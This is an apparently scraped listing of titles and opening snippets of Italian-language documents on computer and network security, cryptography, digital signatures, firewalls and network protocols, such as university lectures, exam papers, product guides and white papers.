L avvocato hacker Genova, 15 marzo 2012 Prof. Giovanni Ziccardi Università degli Studi di Milano L ultimo hacker I temi oggetto d attenzione! La cifratura dei dati con l uso della crittografia.! La sicurezza
Sicurezza. IZ3MEZ Francesco Canova www.iz3mez.it francesco@iz3mez.it
Sicurezza IZ3MEZ Francesco Canova www.iz3mez.it francesco@iz3mez.it La sicurezza La Sicurezza informatica si occupa della salvaguardia dei sistemi informatici da potenziali rischi e/o violazioni dei dati
Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00
Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:
Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00
Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 200, ore 1.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:
Dettaglio attività e pianificazione. snamretegas.it. San Donato Milanese Aprile 2014
Evoluzioni tecnologiche nelle integrazioni B2B introdotte dalla Nuova Piattaforma informatica per la Gestione dei processi commerciali di Programmazione e Bilancio Dettaglio attività e pianificazione San
Software di sistema e software applicativo. I programmi che fanno funzionare il computer e quelli che gli permettono di svolgere attività specifiche
Software di sistema e software applicativo I programmi che fanno funzionare il computer e quelli che gli permettono di svolgere attività specifiche Software soft ware soffice componente è la parte logica
Documenti cartacei e digitali. Autenticità. Cosa si vuole garantire? Riservatezza. Integrità 11/12/2012. PA digitale: documenti e firme (I.
Università degli studi di Catania Pubblica Amministrazione digitale Elementi tecnici sulla firma digitale Ignazio Zangara Agatino Di Bella Area della Formazione Gestione dell archivio (novembre dicembre
Guida di Pro PC Secure
1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) INFORMAZIONI AGGIUNTIVE 1) SOMMARIO Guida di Pro PC Secure Pro PC Secure è un programma che si occupa della protezione dagli attacchi provenienti
Sommario. Modellazione di Kerberos mediante DASM. Kerberos (1) Descrizione Kerberos. Descrizione Kerberos Modellazione Analisi di Correttezza
Sommario Modellazione di Kerberos mediante DASM Descrizione Kerberos Modellazione Analisi di Correttezza DASM per Kerberos 1 DASM per Kerberos 2 Kerberos (1) Descrizione Kerberos Kerberos è traslitterazione
La sicurezza nelle comunicazioni fra PC. Prof. Mauro Giacomini A.A. 2008-2009
La sicurezza nelle comunicazioni fra PC Prof. Mauro Giacomini A.A. 2008-2009 Sommario Cosa significa sicurezza? Crittografia Integrità dei messaggi e firma digitale Autenticazione Distribuzione delle chiavi
Capitolo 8 La sicurezza nelle reti
Capitolo 8 La sicurezza nelle reti Reti di calcolatori e Internet: Un approccio top-down 4 a edizione Jim Kurose, Keith Ross Pearson Paravia Bruno Mondadori Spa 2008 Capitolo 8: La sicurezza nelle reti
Riepilogo delle modifiche di PA-DSS dalla versione 2.0 alla 3.0
Settore delle carte di pagamento (PCI) Standard di protezione dei dati per le applicazioni di pagamento () Riepilogo delle modifiche di dalla versione 2.0 alla 3.0 Novembre 2013 Introduzione Il presente
Indice. Prefazione. Presentazione XIII. Autori
INDICE V Indice Prefazione Presentazione Autori XI XIII XV Capitolo 1 Introduzione alla sicurezza delle informazioni 1 1.1 Concetti base 2 1.2 Gestione del rischio 3 1.2.1 Classificazione di beni, minacce,
Protezione della posta elettronica mediante crittografia
Consorzio per la formazione e la ricerca in Ingegneria dell'informazione Politecnico di Milano Protezione della posta elettronica mediante crittografia Davide Cerri CEFRIEL - Area e-service e Technologies
Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 5
Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15 Parte II Lezione 5 Giovedì 19-03-2015 1 Intensità del traffico e perdita dei pacchetti La componente
Dal protocollo IP ai livelli superiori
Dal protocollo IP ai livelli superiori Prof. Enrico Terrone A. S: 2008/09 Protocollo IP Abbiamo visto che il protocollo IP opera al livello di rete definendo indirizzi a 32 bit detti indirizzi IP che permettono
INFORMATIVA SUL DIRITTO ALLA PRIVACY PER LA CONSULTAZIONE DEL SITO WEB www.arlatighislandi.it
INFORMATIVA SUL DIRITTO ALLA PRIVACY PER LA CONSULTAZIONE DEL SITO WEB www.arlatighislandi.it redatto ai sensi del decreto legislativo n 196/2003 2 GENNAIO 2014 documento pubblico 1 PREMESSA 3 SEZIONE
Introduzione alle applicazioni di rete
Introduzione alle applicazioni di rete Definizioni base Modelli client-server e peer-to-peer Socket API Scelta del tipo di servizio Indirizzamento dei processi Identificazione di un servizio Concorrenza
La firma digitale e le sue possibili applicazioni
Il documento informatico e la firma digitale nelle applicazioni pratiche La firma digitale e le sue possibili applicazioni dott. Enrico Zimuel (enrico@zimuel.it) Pescara, 15 febbraio 2008 Centro Studi
Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento
I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere
Protocolli applicativi: FTP
Protocolli applicativi: FTP FTP: File Transfer Protocol. Implementa un meccanismo per il trasferimento di file tra due host. Prevede l accesso interattivo al file system remoto; Prevede un autenticazione
Firma HSM. A cura di: Enrico Venuto. Politecnico di Torino Coordinatore sicurezza informatica di ateneo
Firma HSM A cura di: Enrico Venuto Politecnico di Torino Coordinatore sicurezza informatica di ateneo Politecnico di Torino 23 novembre 2012 Firma digitale Firma digitale La firma digitale fa uso di un
PostaCertificat@ Concessione del servizio di comunicazione elettronica certificata tra pubblica amministrazione e cittadino- PostaCertificat@
PostaCertificat@ Postecom S.p.A. Poste Italiane S.p.A. Telecom Italia S.p.A. Pag. 1/5 LA SICUREZZA DEL SERVIZIO PostaCertificat@ Limitazione delle comunicazioni - il servizio di comunicazione PostaCertificat@
Elementi sull uso dei firewall
Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall
Aruba Sign 2 Guida rapida
Aruba Sign 2 Guida rapida 1 Indice Indice...2 1 Informazioni sul documento...3 1.1 Scopo del documento...3 2 Prerequisiti...4 2.1.1 Software...4 2.1.2 Rete...4 3 Installazione...5 Passo 2...5 4 Avvio di
La Sicurezza in TITAN
La Sicurezza in TITAN Innovazione per Smartcard e Terminali PoI Emiliano Sparaco - Alberto Ferro Trento 08/03/2013 Agenda 2 Innovazione per Smartcard JavaCard e GlobalPlatform Multi-applicazione: L unione
Xerox SMart esolutions. White Paper sulla protezione
Xerox SMart esolutions White Paper sulla protezione White Paper su Xerox SMart esolutions La protezione della rete e dei dati è una delle tante sfide che le aziende devono affrontare ogni giorno. Tenendo
Sicurezza dei dati. Xml Encryption e Digital Signature. Sicurezza dei dati. XML Encryption. Svantaggio di SSL. SSL (Secure Socket Layer)
Università degli studi di Milano CLS tecnologie dell informazione e comunicazione Seminario di Laboratorio di Base di Dati 2 Xml Encryption e Digital Signature Sicurezza dei dati Grazie alla sua caratteristiche
Protezione della propria rete
Protezione della propria rete Introduzione Questo documento vuole essere un promemoria per la protezione della propria rete informatica oltre che fornire una checklist di supporto nelle modalità di progettazione
Alberto Ferrante. Security Association caching of a dedicated IPSec crypto processor: dimensioning the cache and software interface
Alberto Ferrante Security Association caching of a dedicated IPSec crypto processor: dimensioning the cache and software interface Relatore: Prof. Roberto Negrini Correlatore: Dott. Jefferson Owen (STM)